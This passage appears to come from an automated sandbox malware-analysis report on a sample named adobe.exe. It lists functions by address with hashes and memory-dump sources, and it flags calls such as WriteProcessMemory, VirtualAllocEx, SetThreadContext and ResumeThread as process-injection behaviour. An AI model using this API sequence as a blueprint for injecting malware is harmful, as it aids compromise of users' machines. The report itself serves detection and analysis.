Instruction Fuzzy Hash: A941DFB4C00619CBEF24CFA9C885BDEBBB5BF48314F24805AD408AB261DB796946CF50

Function 05599330 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055993C8

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3f9157689fd00b39075cd8ced6fc822b692ad8e7e4f8a61145f960ce626149ef
Instruction ID: 102ec6dc9fe72291973bc876dd2f0631436751fee14edb5f42cc32df086e317f
Opcode Fuzzy Hash: 3f9157689fd00b39075cd8ced6fc822b692ad8e7e4f8a61145f960ce626149ef
Instruction Fuzzy Hash: 9E2128719002499FDF14CFAAC985BEEBBF5FF88320F148429E919A7240D7799940CBA4

Function 05599338 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055993C8

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 762e574caa57b42894572619a35e093c2aeb230fb30d2434fbf94b17413d9284
Instruction ID: 13319567b9dd4bbb89111069c71c948e86129b0257b6f9ab507ecd3f0ee69048
Opcode Fuzzy Hash: 762e574caa57b42894572619a35e093c2aeb230fb30d2434fbf94b17413d9284
Instruction Fuzzy Hash: 7B2128719002499FDF10CFAAC841BEEBBF5FF48320F108429E919A7240D7799940CBA4

Function 05599198 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0559921E

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 68effd1d9a23d0f80d3465267c44e433965eece0a689afdac4af90b61402a7a9
Instruction ID: 1143bdf8f3e84161e0fb4864aacaa35fee229edccb6e55d72dbcdc0be556fe15
Opcode Fuzzy Hash: 68effd1d9a23d0f80d3465267c44e433965eece0a689afdac4af90b61402a7a9
Instruction Fuzzy Hash: FD213771D002098FDB14DFAAC485BAEBBF4FF88324F14842AD459A7240DB789945CFA5

Function 05599422 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055994A8

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b6efde64032663fc51e6ebd1ec52e777335a39c31be09a0cbe56c682af589af2
Instruction ID: 2f8ca035908f05d943f17e0f3a7b5a8b0c0e0e4d9828e01b489a180f135f7b00
Opcode Fuzzy Hash: b6efde64032663fc51e6ebd1ec52e777335a39c31be09a0cbe56c682af589af2
Instruction Fuzzy Hash: A6213CB1C002499FDF10DF9AC841AEEFBF5FF88320F14842AE519A7240D7799940DBA5

Function 0144CE58 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D54E,?,?,?,?,?), ref: 0144D60F

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 348cfd187ebb84a5247dc8459fe07a87175c8bef8c4c7215c1519173c8de6305
Instruction ID: c730e7264b4b2b5c10be83f7318e5650e5e0d1fb7b82908645440ad138d14abf
Opcode Fuzzy Hash: 348cfd187ebb84a5247dc8459fe07a87175c8bef8c4c7215c1519173c8de6305
Instruction Fuzzy Hash: 5A21E5B5D00248DFDB10CF9AD884AEEBFF4EB48320F14841AE918A7350D375A950CFA5

Function 05599428 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055994A8

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d3ddd99068a790d8a5582d9b65bea9fdbfa8c1e8b090f0cbc454f0d3c634c13c
Instruction ID: 8f0ca28d3f40ede4181caf3fcc1029875c70a90780c005f934668df1327c5045
Opcode Fuzzy Hash: d3ddd99068a790d8a5582d9b65bea9fdbfa8c1e8b090f0cbc454f0d3c634c13c
Instruction Fuzzy Hash: C92139B1C002499FDF10CFAAC840AEEFBF5FF88320F10842AE519A7240D7799940CBA5

Function 055991A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0559921E

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a9e95df47293bebf14b8cc284146421e427b4282761193c409973c28cf5fad2f
Instruction ID: d79390ea023246a3de57037bcc3bd90e3beef990dbff456bcf2a4447a9925129
Opcode Fuzzy Hash: a9e95df47293bebf14b8cc284146421e427b4282761193c409973c28cf5fad2f
Instruction Fuzzy Hash: 68213471D002098FDB14CFAAC485BAEBBF4FF88324F14842AD419A7240DB789944CFA5

Function 0144D580 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0144D54E,?,?,?,?,?), ref: 0144D60F

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f57676908e08bce61c0895ad7254d7f82416237099868e066d1512405fc793bc
Instruction ID: 1361ab204aa9b943095323c89b53d6497d1ab8feb2d59c9a50d29f197fd67d16
Opcode Fuzzy Hash: f57676908e08bce61c0895ad7254d7f82416237099868e066d1512405fc793bc
Instruction Fuzzy Hash: 2521E4B5D00249DFDB10CF9AD984AEEBBF8EB48320F14841AE918A3310D378A954CF65

Function 05599270 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055992E6

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1573c3b11581bb86309393e0f49ba573fa79ccbdceb107299d5de5aa09ea371f
Instruction ID: b9d03dbb8e12c177dcd81d0efcf9f1555411c1c6cdb1b561e3af60a5d3070d55
Opcode Fuzzy Hash: 1573c3b11581bb86309393e0f49ba573fa79ccbdceb107299d5de5aa09ea371f
Instruction Fuzzy Hash: 24216A728002498BCF10DFAAC844BEEFFF5FF88320F148419E419A7250DB799900CBA0

Function 05599278 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055992E6

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 56616698a993b9c2d6a81cf4d22312cdac01070cb74f4d71ab91a76ef0049b59
Instruction ID: 3082b052f1288d0a838d12ca629b7ae3ff0a6ccc02db958b7b9d0e1eaffcfd6f
Opcode Fuzzy Hash: 56616698a993b9c2d6a81cf4d22312cdac01070cb74f4d71ab91a76ef0049b59
Instruction Fuzzy Hash: 071126719002499FDF10DFAAD844AEEBFF5EF88320F148819E519A7250CB7A9940CBA5

Function 055990EA Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05599152

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aff6f4de460ab89532991d7fa3c34bad35769f14c54f12339b0ace11874dd73d
Instruction ID: 8cb4b8e24f0749790357b86be595f30794109d9f440617e9f01782e2cf202413
Opcode Fuzzy Hash: aff6f4de460ab89532991d7fa3c34bad35769f14c54f12339b0ace11874dd73d
Instruction Fuzzy Hash: 2C112871D002498BDB14DFAAC8457EEFBF8FB88324F24881AD519A7240DA79A944CB95

Function 055990F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05599152

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dfaba2d09d22d9d5f8130bb7287eb9a651e88a630b4a7ddc4863fe5ee38d8ee0
Instruction ID: 36b6af2ef2aac5a6e24f5de47f80ceb8a6778a30d203a952cca065fbf13140c0
Opcode Fuzzy Hash: dfaba2d09d22d9d5f8130bb7287eb9a651e88a630b4a7ddc4863fe5ee38d8ee0
Instruction Fuzzy Hash: 16113A71D002498FDB14DFAAC4457EEFBF8FF88324F14841AD519A7240DB796944CB95

Function 0144B2A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144B306

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 05f307f28f257f59c1ec284be828dbe2fc401be307c5313c175e4747996feebd
Instruction ID: 573be9b46ca300327f29345412db69997f20bb9b13e64c9266fb1bb5dad3a831
Opcode Fuzzy Hash: 05f307f28f257f59c1ec284be828dbe2fc401be307c5313c175e4747996feebd
Instruction Fuzzy Hash: F011DFB6C006498FDB10CF9AD844ADEFBF8EF88220F14851AD919A7310D379A545CFA5

Function 05673A08 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead75eb04be1eb5f818ec0182ce4c966f73ce844b056cb57e5bcc9f128ec2840
Instruction ID: 1713befbf72e71deacd19ee9e19ab9128389f1ab2892414415f52e92e6b0b7c0
Opcode Fuzzy Hash: ead75eb04be1eb5f818ec0182ce4c966f73ce844b056cb57e5bcc9f128ec2840
Instruction Fuzzy Hash: 002195B6F0021A8BDF05DBB8C9416EE77B6EF98200F14452AD405E7350EB349905D771

Function 05670448 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386e32a18f4ec32f0c3243a4ebeff1326324d17693309519706080a39a4194af
Instruction ID: dcc9573e06813744b9eae8025c440909fcebaa38825b347f099cbdd69f9c3dea
Opcode Fuzzy Hash: 386e32a18f4ec32f0c3243a4ebeff1326324d17693309519706080a39a4194af
Instruction Fuzzy Hash: 3141AD75E00249CBDF19EFB5C1586ADBBB2EFC8220F204429D406AB360DF394981CFA5

Function 056741DC Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379fed52797a0cb62f854d6e61324bcacb4ace21fdc24541ebd71cd404f0f504
Instruction ID: 0d48c2e0dbfc80581833adde605d78d7b9ca34dcfac752fefda20a41173bb08a
Opcode Fuzzy Hash: 379fed52797a0cb62f854d6e61324bcacb4ace21fdc24541ebd71cd404f0f504
Instruction Fuzzy Hash: 2441C1B1D00209CBDB20CFAAC585ADDBBB5FF48315F24852AD409AB250DB756A46CF90

Function 056741E8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845db1b50974e2a09cecb5ccd7c81a97ef569a70e4bac81353616425455813c4
Instruction ID: 23f30c274cd26f626259e0e865461bf2d8773f78159002d4948c6129c7fc9223
Opcode Fuzzy Hash: 845db1b50974e2a09cecb5ccd7c81a97ef569a70e4bac81353616425455813c4
Instruction Fuzzy Hash: F541B0B1D00209CBDB20CFAAC584ADDFBB5BF48315F64852AD409AB210DB756A46CF91

Function 05673110 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d539e425198e4ef43035448e6498d8edc8b8a4f76cdc67ec34e1f11d8dbcc717
Instruction ID: c54b5c6d372c0704102892eaf5b55229f76c3c42ca375a798a4b8576128f445c
Opcode Fuzzy Hash: d539e425198e4ef43035448e6498d8edc8b8a4f76cdc67ec34e1f11d8dbcc717
Instruction Fuzzy Hash: D141BFB0D1025DDFDB14CF9AC888A9EFBB1BF88750F60852AE418AB354DB745845CF91

Function 05673141 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b16578a67dac28cc94cb9223662e09954f5695cea52000c49ce7cea06062d51
Instruction ID: 054561441611475fa6855fa9d1b481d222dd8145cf744c5f9afce81c6d487e78
Opcode Fuzzy Hash: 8b16578a67dac28cc94cb9223662e09954f5695cea52000c49ce7cea06062d51
Instruction Fuzzy Hash: B941BEB0D10259DFDB14CF9AC888ADEFBB1BF88750F20862AE419AB354DB745845CF91

Function 05670438 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a77da9b0e8a36da4f49d5055d786962b0717fdbdd15c470573c7296d7df7623
Instruction ID: 2f2f09a12427a35a88aca5cb3eb45e26f43cdaee43d80bb62cb1509fb2dbecfb
Opcode Fuzzy Hash: 3a77da9b0e8a36da4f49d5055d786962b0717fdbdd15c470573c7296d7df7623
Instruction Fuzzy Hash: E23161B5E00249CBDF29EB74C6592AD77A2EF88221F244529C405BA364DF798981CFB1

Function 05670CF9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 632596fb316f6e98a8c396e0e2b801a778124558df7acab7c886cdaeddf4db51
Instruction ID: 3d6264fb97521c69880ab585f82f57aa925db7789e1a353d9b33fb473b455dfc
Opcode Fuzzy Hash: 632596fb316f6e98a8c396e0e2b801a778124558df7acab7c886cdaeddf4db51
Instruction Fuzzy Hash: A031F635A20209EFCB05DFA4D84899EBBB6FF89310F548525F002BB260EF34A845CB90

Function 012ED1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c3a454be4bd8b89cf627411e1e905a2edfa0393db5ffccaa9913806747a49f
Instruction ID: 9f9399881cb06da00d0d2b51122e01250d030eb8ea9d36e55a160af218ce9e70
Opcode Fuzzy Hash: 47c3a454be4bd8b89cf627411e1e905a2edfa0393db5ffccaa9913806747a49f
Instruction Fuzzy Hash: 6B210671514248DFDF05DF98D9C8B26BFA5FB88320F64C569E9090B247C376D416CBA1

Function 012ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee77becb1381c08314e7a9c298e0cec4c100525dc7459f0bae636a2bec51bbcb
Instruction ID: 8ed5d786faba612d34b23bdf8d68be95a8ae6836ef42b92e5c5fd2e9993e376a
Opcode Fuzzy Hash: ee77becb1381c08314e7a9c298e0cec4c100525dc7459f0bae636a2bec51bbcb
Instruction Fuzzy Hash: 032148B5510248DFDB01DF88C9C4B56BFE5FBA8314F64C56CE9090F246C336E406CAA1

Function 05670D08 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1936102d1776989dc45c23024b414a8e4fe098beb9d0efc3986250647dfcf04e
Instruction ID: 5bb82601fed73caf0ed8b76bd983e3a1578dc3c14abc8d4a617f1aaf79cf9b8c
Opcode Fuzzy Hash: 1936102d1776989dc45c23024b414a8e4fe098beb9d0efc3986250647dfcf04e
Instruction Fuzzy Hash: D521B535A10209EFCB05DFA4D84899EBFB6FF89314F158525F002BB264EF35A849CB90

Function 056740D0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e796d1c45d4b1ad34a981bafe65ebbacb60ec715f6ad61fbe2d4a633e6a663
Instruction ID: 8b6da36928c851c1fea707a932f87d608914bc690fba7469c5f74d3a6af7d86e
Opcode Fuzzy Hash: e1e796d1c45d4b1ad34a981bafe65ebbacb60ec715f6ad61fbe2d4a633e6a663
Instruction Fuzzy Hash: 3621A4357002094FCB10EB79C858AAF7BF6EF84221F108D69E516DB790EF74D8048B91

Function 013FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1704444369.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11d638e99d6992e3766335b996c6cdfa609892efebe922124d951b1163815d5
Instruction ID: 030768d2a61b56911a1e8358f6012d755c25e59a0cb34bed45039ac26c1a2e2f
Opcode Fuzzy Hash: d11d638e99d6992e3766335b996c6cdfa609892efebe922124d951b1163815d5
Instruction Fuzzy Hash: EE213471604205DFDB15DF58D8C8B26BFA5FB88318F24C96DEA0A4B346C33AD407CA61

Function 013FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1704444369.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0936b82ac014d0af9574400cc4c2d33fc0cfee5c1edc946f28a0978b39d466
Instruction ID: 13b8bcd46593a52732f0549337390ed108075f080926d1a69cbe7c63da2bcf2e
Opcode Fuzzy Hash: 9a0936b82ac014d0af9574400cc4c2d33fc0cfee5c1edc946f28a0978b39d466
Instruction Fuzzy Hash: BC2180755093808FDB13CF64D994715BF71EB46218F28C5EAD9498F2A7C33A980ACB62

Function 012ED1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
Instruction ID: 1ff640a366e14e0d0ffca10596c00e8328903d4a6da8774acaa8c85c42a45784
Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
Instruction Fuzzy Hash: 6C21C076404244CFDB06CF54D9C4B16BFA1FB84320F24C1A9DD080B257C33AD416CB91

Function 012ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction ID: 4a2edd9da145a6fb85bc3fb659044a1e88fd0542f76cdae2e38777d36eb06af8
Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction Fuzzy Hash: 67110376404285CFDB12CF44D5C4B56BFB1FB94324F24C2A9DA090B257C33AE45ACBA1

Function 056704D2 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418ef1d7ccfc5f5d2026356db7abd04b433307ee023ec497cabfedbedf431fc4
Instruction ID: 6dd4ffeb56cc4f05eca6c080f6bbbb9b581cf920332496b38054bb6a7d02f939
Opcode Fuzzy Hash: 418ef1d7ccfc5f5d2026356db7abd04b433307ee023ec497cabfedbedf431fc4
Instruction Fuzzy Hash: DC115EB5E0420ACFEF25EF75C2583AD7AA2EF88361F144429D401AA290DF784984CFB5

Function 0567052D Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e155deaad43e9bdba3e7d6661fdb7fe919b2e3c244477c7cef1d7cff6a080e32
Instruction ID: c104df4d384c0eb1120d22ca22f03ae4cc54d8de1669f922bd39ee6a57695eff
Opcode Fuzzy Hash: e155deaad43e9bdba3e7d6661fdb7fe919b2e3c244477c7cef1d7cff6a080e32
Instruction Fuzzy Hash: F4F054B1E0420ACBEB14EF75D65976D7BB2EF88355F148529D001AB690DF784484CFB1

Function 05674079 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d44330969e7b89dfde46b66b6f082883c8b47d043a1bf94a1e63ba8c0711e1
Instruction ID: 424659971562ffbb0daa1708725bde90fcf3f4cf9c93a13aefe52a2573a8f9be
Opcode Fuzzy Hash: e0d44330969e7b89dfde46b66b6f082883c8b47d043a1bf94a1e63ba8c0711e1
Instruction Fuzzy Hash: 6BE09B7590120AEFCB00EFB5D90266D7BF5EB45711F118769D805A7380EA396F009755

Function 05674088 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e89669da587eaea31211efc82310d8b752fcff62045fb4e26121e929bb54c5f
Instruction ID: 0b3d7496f98676700ef16494c4e0d8352d489093ce73af62d407eab01d7d98dd
Opcode Fuzzy Hash: 1e89669da587eaea31211efc82310d8b752fcff62045fb4e26121e929bb54c5f
Instruction Fuzzy Hash: 19E0867590110AEFCB00EFB5D6024AC7BB9EB443047108565E805A7340DA3A2F10DB55

Analysis Process: adobe.exePID: 1400, Parent PID: 516COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	4

Executed Functions

Function 06B734A8 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B73C00
$eq, xrefs: 06B73BF4
$eq, xrefs: 06B73BB3
$eq, xrefs: 06B73BD0
$eq, xrefs: 06B73BDC
$eq, xrefs: 06B73BA7

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: 962bd63a886283b698a3793879920795b541751a94ea247b32529d3020f83be2
Instruction ID: 6f042d9577e6456bebcf1752067c478a0b3222d7cb416a1eae241dce0265bd32
Opcode Fuzzy Hash: 962bd63a886283b698a3793879920795b541751a94ea247b32529d3020f83be2
Instruction Fuzzy Hash: 9A321D70E1071ACFCB55EF79C89459DF7B2FF89300F5086A9D419AB264EB30A985CB90

Function 06B77DC8 Relevance: 3.0, Strings: 2, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06B78105
$eq, xrefs: 06B78111

Memory Dump Source

Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
